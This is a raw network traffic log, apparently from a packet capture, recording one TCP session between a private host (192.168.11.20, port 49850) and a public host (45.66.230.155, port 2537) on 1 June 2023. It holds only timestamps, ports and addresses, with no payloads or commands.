Jun 1, 2023 22:36:41.567718983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567754984 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567775965 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567794085 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567811966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567828894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567830086 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.567847967 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567878008 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.567926884 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.567975998 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.568259954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568310976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568380117 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568438053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568454027 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568459034 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.568479061 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568495035 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568507910 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.568514109 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568542957 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568561077 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568567991 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.568581104 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.568615913 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.568665981 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.568715096 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.569216967 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569262981 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569322109 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569391966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569405079 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.569417953 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569438934 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569453001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569472075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569483995 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569513083 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.569591045 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569603920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.569622040 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.569736958 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.570115089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570163965 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570230961 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570292950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570306063 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570317984 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570414066 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.570595026 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.570595026 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.570628881 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570672989 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570785046 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570805073 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570869923 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.570885897 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570944071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570956945 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570977926 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.570990086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571002007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571013927 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571113110 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.571113110 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.571171999 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.571171999 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.571515083 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571569920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571644068 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571695089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571707964 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571757078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571814060 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571826935 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571839094 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571856976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571868896 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.571872950 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.571872950 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.572055101 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.572055101 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.572457075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572504044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572561979 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572618961 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572630882 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572648048 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572669983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572689056 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572745085 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572757959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572770119 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.572819948 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.572819948 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.572819948 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.572999954 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.573489904 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573543072 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573600054 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573657036 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573668957 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573681116 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573707104 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573726892 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573766947 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573780060 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573791981 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.573870897 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.573870897 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.573870897 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.573870897 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.573870897 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.574270010 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574383974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574436903 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574449062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574460983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574472904 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574477911 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.574579954 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.574579954 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.574745893 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574759007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574858904 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574913979 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574940920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574954033 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574966908 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.574968100 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.574968100 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.574985981 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575006008 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575020075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575063944 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.575063944 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.575124025 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575161934 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.575263023 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.575702906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575748920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575818062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575881958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575885057 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.575902939 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575928926 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575947046 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575973988 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.575992107 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.575993061 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576011896 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576036930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576042891 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.576144934 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.576612949 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576661110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576715946 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576766968 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.576777935 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576813936 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576837063 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576848030 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.576872110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576891899 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576910973 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576924086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576929092 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.576941013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.576982975 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.577116966 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.579622030 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579727888 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579785109 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579806089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579839945 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579863071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579910040 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579926014 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.579930067 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579947948 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.579978943 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.580060005 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.822413921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.822614908 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.888988018 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.888988018 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.906946898 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.906987906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907038927 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907129049 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907140970 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907152891 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907174110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907185078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907264948 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907458067 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.907458067 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.907458067 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.907491922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907514095 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907649994 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.907655954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907672882 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907717943 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907769918 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907782078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907793999 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907812119 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907824039 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907840014 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.907883883 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907890081 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.907905102 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.907938004 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.907938004 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.907969952 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908081055 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.908128977 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.908437967 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908559084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908654928 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908677101 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908710003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908729076 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.908730030 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908750057 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908770084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908788919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908806086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908823967 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908837080 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.908837080 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.908842087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908932924 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.908962965 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.908982992 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.909415007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909471035 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909533024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909555912 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.909594059 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909619093 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909650087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909672976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909708977 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909709930 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.909709930 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.909729004 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909750938 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909779072 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909830093 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909845114 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.909846067 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.909851074 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.909941912 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.909991026 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.910317898 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910366058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910440922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910557032 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.910567045 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910618067 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910629988 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910641909 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910676003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910696983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910712957 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910718918 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.910731077 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.910816908 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.910816908 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.911178112 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911273003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911326885 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911365986 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911389112 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911418915 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911439896 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911465883 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.911477089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911495924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911508083 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911520004 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911531925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911544085 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.911648035 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.911648035 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.911648035 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.911648035 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.911695957 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.912185907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912296057 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912348986 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912369013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912415028 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912436962 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.912489891 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.912563086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912580013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912610054 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912626982 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912652969 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912671089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912689924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912714005 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.912715912 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.912763119 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.912811995 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.913048029 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913175106 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913182974 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.913315058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913336992 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913425922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913435936 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.913480997 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913501978 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913533926 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913557053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913562059 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.913615942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913615942 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.913641930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913695097 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.913706064 CEST	49850	2537	192.168.11.20	45.66.230.155
